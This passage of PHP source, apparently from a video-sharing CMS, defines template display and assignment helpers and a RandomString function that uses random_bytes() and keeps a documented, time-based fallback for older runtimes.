    $path = $inside ? $name : LAYOUT.'/'.$name;
    return CBTemplate::fetch($path);
}
//Simple Template Displaying Function
/**
 * Displays a template through CBTemplate::display().
 *
 * With $layout true the template is looked up under LAYOUT; otherwise $template
 * is used as given. For 'footer.html' outside the admin area, and for
 * 'header.html' always, the copy under BASEDIR/includes/templatelib/ is
 * displayed as well.
 *
 * @param string $template Template file name.
 * @param bool   $layout   Whether to prefix the name with LAYOUT.
 */
function Template($template,$layout=true){
    global $admin_area;

    $primary = $layout ? LAYOUT.'/'.$template : $template;
    CBTemplate::display($primary);

    // The two checks stay separate: each one triggers its own display call.
    $is_public_footer = ($template == 'footer.html' && $admin_area != TRUE);
    if ($is_public_footer) {
        CBTemplate::display(BASEDIR.'/includes/templatelib/'.$template);
    }

    $is_header = ($template == 'header.html');
    if ($is_header) {
        CBTemplate::display(BASEDIR.'/includes/templatelib/'.$template);
    }
}
/**
 * Forwards a template variable to CBTemplate::assign().
 *
 * @param string $name  Variable name as seen by the template.
 * @param mixed  $value Value to expose.
 */
function Assign($name,$value)
{
    CBTemplate::assign($name, $value);
}
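//Function of Random String
/**
 * Returns a lowercase hexadecimal string of $length characters.
 *
 * The original derived its output from md5(microtime()) and rand(), which is
 * predictable from the request time and capped the result at 32 characters.
 * Where random_bytes() is available the value now comes from the system CSPRNG
 * and any positive length is honoured; the old derivation is kept only as a
 * fallback for runtimes without random_bytes().
 * NOTE(review): callers are not visible here. If any of them use this value
 * as a security token (reset code, session or API key), the fallback path is
 * not suitable for them.
 *
 * @param int $length Number of characters wanted.
 * @return string Hex string; empty when $length is not positive.
 */
function RandomString($length)
{
    $length = (int) $length;
    if ($length <= 0) {
        return '';
    }

    if (function_exists('random_bytes')) {
        // Two hex characters per byte; trim the extra one for odd lengths.
        $bytes = random_bytes((int) ceil($length / 2));
        return substr(bin2hex($bytes), 0, $length);
    }

    // Legacy fallback: time-derived digest, at most 32 characters.
    $string = md5(microtime());
    $highest_startpoint = max(0, 32 - $length);
    return substr($string, rand(0, $highest_startpoint), $length);
}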